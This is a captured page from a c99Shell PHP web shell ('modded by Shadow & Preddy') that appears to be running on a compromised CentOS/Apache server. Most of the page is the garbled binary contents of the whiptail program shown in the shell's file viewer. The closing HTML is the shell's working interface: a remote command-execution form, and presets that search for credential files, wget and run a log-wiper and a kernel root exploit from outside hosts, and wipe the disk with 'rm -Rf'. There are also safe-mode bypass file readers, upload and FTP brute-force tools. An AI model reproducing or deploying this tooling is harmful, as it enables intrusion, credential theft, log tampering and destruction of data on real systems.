!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/bin/   drwxr-xr-x
Free 52.27 GB of 127.8 GB (40.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     whiptail (23.8 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
ELF@4Z4 (444444LLLLHHH PtdIQtd/lib/ld-linux.so.2GNU T @H TVZ|CE$KqXIb\-zi;UOj E47nqCVR@gzo+vI@ a{vi>9B' e]:sBbMJ%oC @ )qED<2229T6h;{*lO%OM.$w<@4 4MsXz MhMMhP1MC6M:Mq5.^^^^^_8_<_____̿п0Կؿܿٳz b " 6ii ii ti ii  V+9>    V  $(,048 <!@"D#H$L%P&T'X(\)`*d,h-l.p/t0x1|2345678:;<=?@ABCDEFGHIJKLMNOPQRSU%G35%%h%h%h%h%h %h(%h0%h8p%h@`%hHP%hP@%hX0%h` %hh%hp%hx%h%h% h%h%h%h%h% hp%$h`%(hP%,h@%0h0%4h %8h%<h%@h%Dh%Hh%Lh%Ph%Th %Xh(%\h0%`h8p%dh@`%hhHP%lhP@%phX0%th` %xhh%|hp%hx%h%h%h%h%h%h%h%hp%h`%hP%h@%h0%h %h%h%h%h%h%h%h%h %h(%h0%h8p%h@`%hHP%hP@%hX0%h` %hh1^PTRhhQVh0KUS[HHtX[ÐUS= u?-X9v&9w []Ít&'Utt $ÐUUtv<\tBu]ÀznBu B ҍUSOG$^fU]z*Gu(D$D$$t0D$D$$0$&D$D$$1Uu֋U]ÒFt&tHD$$]u]Ãt"D$$]u]Ít&D$$~]u]fU]u1UF҉}ljMt2u:< tH)Љ$D$UD$$]u}]< tt< u볐U]EÄEu}D$D$$DxED$t$$tU$$LEȉ$t/Eȉ|$4$D$X9EuZ4$]u}]ÍD$D$$nUD$T$ D$$뎋E$$L$qUWVSQrD8It=MUƉ$T$>űE$EEE|$$eE,ME~EEMDžM9ЉE0ED$$t$$ED$ $ VAUEDž[$1g$$dD$$n$-g: k>t&_tqt$D$ |$D$$ƃ.EȉD$T$t$|$L$ 4$QuD$Eȉ$D$ L$t$|$4$9aD$T$t$|$L$ 4$&EȉD$ED$T$t$|$L$ 4$5EĉD$D$T$t$|$L$ 4$ D$Eċ$Eĉ$wvEȉD$D$t$|$T$ $:EĉD$D$T$t$|$L$ 4$- EċDžLD$D$ %D$$pDžWEЅtT$ D$D$ $-ŋD$ L$ E $ E4$E E4$$T |1 DBK׋V;Dž(DžDž" (N~$D$ $$D$$u둃E$ D$Eĉ$vD$E$jE$T$sEX+ED$($JU‰UD$"D$ D$D$4$% 21U$4$D$ $t$D$D$ D$$$OD$D$$T$ D$D$$;$$1$1Dž($ÐUUE 9}] UUE 9~] UE]3t]ǁHLÍv]ǁHLÐ&UWVS,X3EUMtvLED$D$$q+HD$GD$U$UUE D$U$L,[^_]ËLE荃D$D$U܉$VUUUD$EE}+H+u؃D$4$UULE썃D$D$U܉$+HD$GD$D6 $UU D$ D$UD$E$K,[^_]Í&UWVSÝ1,}D$D$$EE@D$E +HD$ ED$$D$ƋE4$D$ t$E$nLE䍃D$D$U$~VUUUD$Eu E}+H+}܉D$<$UE싃LED$D$U$ +Ht$D$D? $UD$ D$NjED$U$Etu|$E$dt&L1D$D$$D$E +HD$U$։D$U$U$E$9t+,[^_]Ðt&U1$,[^_]þ΍'UWVS<}U/UeU1҉EE $Ec)čD$#Eԉt<\quUE܃@|$D$T$ D$$~UԉT$lj$<$9E~D$<$RuUE؉Ue3u*e[^_]Ðt&ynqdq [&'Uh]U 4.Ee M1ɉ}}uDž $<$ɉtt<$u$Ue3]u}]ÍD$ D$ D$$8uDžDžDžDžDž<q<$KE:u :FtD$4$^*D$B$; <$49"T$ $$D$҉A4D$A$CD$4$R TD$D$$UL$}<$E +H+9'4$D$D$+D$ $uD$ED$ D$|$D$$hPDž1tD$1? $D$ T$D$F D$D$F $hF D$$9FD$FL$D$ D$D$D$$YM|$D$$L$D$ D$F $L$<$E<$ D$|$D$ D$$M D$U$E L$<$ t9MB$@;Gt.1҃ ; ;Ou$+‹҉ABs0<$!O&D$ D$ D$ET$$' $ƉD$~'11ɋ1<: ;u$P‹҉1~\1Dž< t  ;uȋ;&'UWVSLE̋E$&U؋ỦMȉEeE1EU܍UEEEEEURfEЋU9ЉE}iE$RxZUԍ<E;8MU؋E܉t$T$$kUuu؉UЉ}wUT$ UD$E؉$D$ZE̋UUԋEĉEЋUe3uL[^_] v'UWVS --yesno --infobox --inputbox [init] --passwordbox [init] --textbox --menu [tag item] ... --checklist [tag item status]... --radiolist [tag item status]... --gauge Options: (depend on box-option) --clear clear screen on exit --defaultno default no button --default-item set default string --fb use full buttons --nocancel no cancel button --noitem display tags only --separate-output output one line at a time --output-fd output to fd, not stdout --title display title --backtitle <backtitle> display backtitle --scrolltext force vertical scrollbars ����%s: too large to display. �backtitle�checklist�clear�defaultno�inputbox�fb�fullbuttons�gauge�infobox�menu�msgbox�nocancel�noitem�default-item�notags�radiolist�scrolltext�separate-output�textbox�yesno�passwordbox�output-fd�help�version�/usr/share/locale�newt�whiptail�whiptail (newt): %s �0.52.1�%s: %s �w�Cannot open output-fd �open /dev/tty�%d�"%s"���#@]z &Cy])Ra&DD@@aOk�Cancel�Yes�No�yes�%%-%ds %%s�XXX����;��������������� ��,��P��t������������<��`��H��X��x�����������zR�| ��������4����AB ������8��������AB A���T�������AB FN����t���t����AB FH� ����������AB IR��� ������@ ���AB IT���,������,���D � F AB D������ ������AB ������(������AB ������D��H����AB ��� ���`��i���AB AG��������d3���AB C ��������AB BF��� �����R���AB I`L����������AB F��� �����AB F ���,��"���AB IZ��� ���P�����AB I]L���������������������������z��������������������6�� ���4 ���oh���$��� ����� �������������������p�����������č������8���������oo���oFoXo���oo������������������������<p�Dh��@h�b����ɲ�0R� �@X�b�@ �?� �0K��PU�P�@�������`2���ò�S��å�Y� �o��i���ٳ�0�o� K�ϯ�!�Q�#�r��X�A��5���P�V��`�0i�0��г�`��ȥ���`� T� ���К�P=���p=�9��@<��@� �G�E���������<�����������������������������libnewt.so.0.52�__gmon_start__�_Jv_RegisterClasses�newtListboxGetCurrent�newtFormSetHeight�newtScaleSet�newtEntry�newtCls�newtRadiobutton�newtRadioGetCurrent�newtScale�newtListboxAppendEntry�newtTextbox�newtDrawForm�newtInit�newtListbox�newtFormSetCurrent�newtTextboxSetText�newtFormAddComponents�newtListboxSetCurrent�newtTextboxSetHeight�newtCheckbox�newtFormAddComponent�newtCompactButton�newtRefresh�newtVerticalScrollbar�newtFormSetWidth�newtButton�newtRunForm�newtDrawRootText�newtForm�newtTextboxGetNumLines�_newt_wstrlen�newtFinished�newtOpenWindow�newtPopWindow�newtFormSetBackground�newtFormGetCurrent�newtCheckboxSetFlags�libslang.so.2�SLtt_Screen_Rows�SLtt_Screen_Cols�libm.so.6�libdl.so.2�libpopt.so.0�_fini�_init�poptGetNextOpt�poptGetArgs�poptGetContext�poptBadOption�poptGetOptArg�poptGetArg�poptStrerror�libc.so.6�_IO_stdin_used�exit�_IO_putc�setlocale�mbrtowc�perror�dcgettext�realloc�__ctype_get_mb_cur_max�fgets�memset�read�__fprintf_chk�stdout�fputs�memcpy�malloc�strcasecmp�wcwidth�stderr�__snprintf_chk�dup�__fxstat�sigaction�setlinebuf�close�fdopen�__sprintf_chk�bindtextdomain�strcmp�__libc_start_main�snprintf�__strtoul_internal�free�__stack_chk_fail�_edata�__bss_start�_end�SLANG2�NEWT_0.52�GLIBC_2.4�GLIBC_2.1�GLIBC_2.3.4�GLIBC_2.0�/lib/ld-linux.so.2�whiptail.debug��}ELF��������������@4���O������4� ��(������4���44���������������4��44���������������������L��L�����������L��p�������������L�����������������H��HH ��� ���������PtdI��������������Qtd�������������������������� ���������44�����������������������������HH�� ������������������!���o���hh��@����������������+��� ����������������������3���������XX�������������������;���o���FF ������������������H���o��� ������������������W��� ������ ��8����������������`��� ������č ��p����� ���������i���������44��������������������d���������LL������������������o���������@@��x.�����������������u���������C��������������������{���������C����������������������������I�����������������������������$$J��t��������������������������L�����������������������������L�����������������������������L�����������������������������L���������������������������M����������������������������M��D�������������������������N�� ���������������������������O����������������������������������O����������������������������������O���������������������.shstrtab�.interp�.note.ABI-tag�.gnu.hash�.dynsym�.dynstr�.gnu.version�.gnu.version_r�.rel.dyn�.rel.plt�.init�.text�.fini�.rodata�.eh_frame_hdr�.eh_frame�.ctors�.dtors�.jcr�.dynamic�.got�.got.plt�.data�.bss�.gnu_debuglink�.gnu.liblist�.gnu.conflict�.gnu.prelink_undo����������������������������������������� ���������44�����������������������������HH�� ������������������!���o���hh��@����������������+��� �������������������������o���XX������������������������������������������ ���;���o���FF ������������������H���o��� ������������������W��� ������ ��8����������������`��� ������č ��p����� ���������i���������44��������������������d���������LL������������������o���������@@��x.�����������������u���������C��������������������{���������C����������������������������I�����������������������������$$J��t��������������������������L�����������������������������L�����������������������������L�����������������������������L���������������������������M����������������������������M��D�������������������������N�� ���������������������������O��������������������3���������$$O����������������������������������$T����������������������������������8T��D������������������������������|Y�� �����������������</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="?act=cmd&d=%2Fusr%2Fbin%2F"><b>Command execute</b></a> ::</b></p></td></tr> <tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="?"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/usr/bin/"><input type="text" name="cmd" size="50" value=""><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="?act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/usr/bin/"><select name="cmd"><option value="ls -la">-----------------------------------------------------------</option><option value="find / -type f -perm -04000 -ls">find all suid files</option><option value="find . -type f -perm -04000 -ls">find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">find all sgid files</option><option value="find . -type f -perm -02000 -ls">find sgid files in current dir</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name "config*"">find config* files</option><option value="find . -type f -name "config*"">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name service.pwd">find all service.pwd files</option><option value="find . -type f -name service.pwd">find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">find all .htpasswd files</option><option value="find . -type f -name .htpasswd">find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . -type f -name .bash_history">find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">find .fetchmailrc files in current dir</option><option value="lsattr -va">list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">show opened ports</option></select><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td></tr></TABLE> <br> <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="?act=cmd&d=%2Fusr%2Fbin%2F"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr> <tr> <td width="50%" height="83" valign="top"><center> <div align="center">Useful Commands </div> <form action="?"> <div align="center"> <input type=hidden name=act value="cmd"> <input type=hidden name="d" value="/usr/bin/"> <SELECT NAME="cmd"> <OPTION VALUE="uname -a">Kernel version <OPTION VALUE="w">Logged in users <OPTION VALUE="lastlog">Last to connect <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? <OPTION VALUE="which wget curl w3m lynx">Downloaders? <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO <OPTION VALUE="netstat -atup | grep IST">Open ports <OPTION VALUE="locate gcc">gcc installed? <OPTION VALUE="rm -Rf">Format box (DANGEROUS) <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 <OPTION VALUE="./zap2">WIPELOGS PT3 <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) </SELECT> <input type=hidden name="cmd_txt" value="1">   <input type=submit name=submit value="Execute"> <br> Warning. Kernel may be alerted using higher levels </div> </form> </td> <td width="50%" height="83" valign="top"><center> <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> <input name="q" type="text" id="q" value="Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686"> <input type="hidden" name="client" value="firefox-a"> <input type="hidden" name="rls" value="org.mozilla:en-US:official"> <input type="hidden" name="hl" value="en"> <input type="hidden" name="hs" value="b7p"> <input type=submit name="btnG" VALUE="Search"> </form></center> </td> </tr></TABLE><br> <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="?act=cmd&d=%2Fusr%2Fbin%2F"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr> <tr> <td width="50%" height="83" valign="top"><center> <div align="center">Php Safe-Mode Bypass (Read Files) </div><br> <form action="?"> <div align="center"> File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> <br> </div> </form> </td> <td width="50%" height="83" valign="top"><center> <center>Php Safe-Mode Bypass (List Directories): <form action="?"> <div align="center"><br> Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> </form></center> </td> </tr></TABLE><br> <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr> <td width="50%" height="1" valign="top"><center><b>:: <a href="?act=search&d=%2Fusr%2Fbin%2F"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="/usr/bin/"><input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> - regexp <input type=submit name=submit value="Search"></form></center></p></td> <td width="50%" height="1" valign="top"><center><b>:: <a href="?act=upload&d=%2Fusr%2Fbin%2F"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1"> <input type=submit name=submit value="Upload"><br><font color=red>[ Read-Only ]</font></form></center></td> </tr> </table> <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="?"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="/usr/bin/"><input type="text" name="mkdir" size="50" value="/usr/bin/"> <input type=submit value="Create"><br><font color=red>[ Read-Only ]</font></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="/usr/bin/"><input type="text" name="mkfile" size="50" value="/usr/bin/"><input type=hidden name="ft" value="edit"> <input type=submit value="Create"><br><font color=red>[ Read-Only ]</font></form></center></td></tr></table> <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="?"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="/usr/bin/"> <input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="?"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="/usr/bin/"><input type="text" name="f" size="50" value="/usr/bin/"> <input type=submit value="Go"></form></center></td></tr></table> <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c999shell v. 1.0 pre-release build #16 <a href="?act=about"><u><b>Modded by</b></u></a> Shadow & Preddy | <a href="http://rootshell-security.net"><font color="#FF0000">RootShell Security Group</font></a><font color="#FF0000"></font> | <a href="http://r57shell.net"><font color="#FF0000">r57 c99 shell</font></a><font color="#FF0000"></font> | Generation time: 0.0087 ]--</b></p></td></tr></table> </body></html>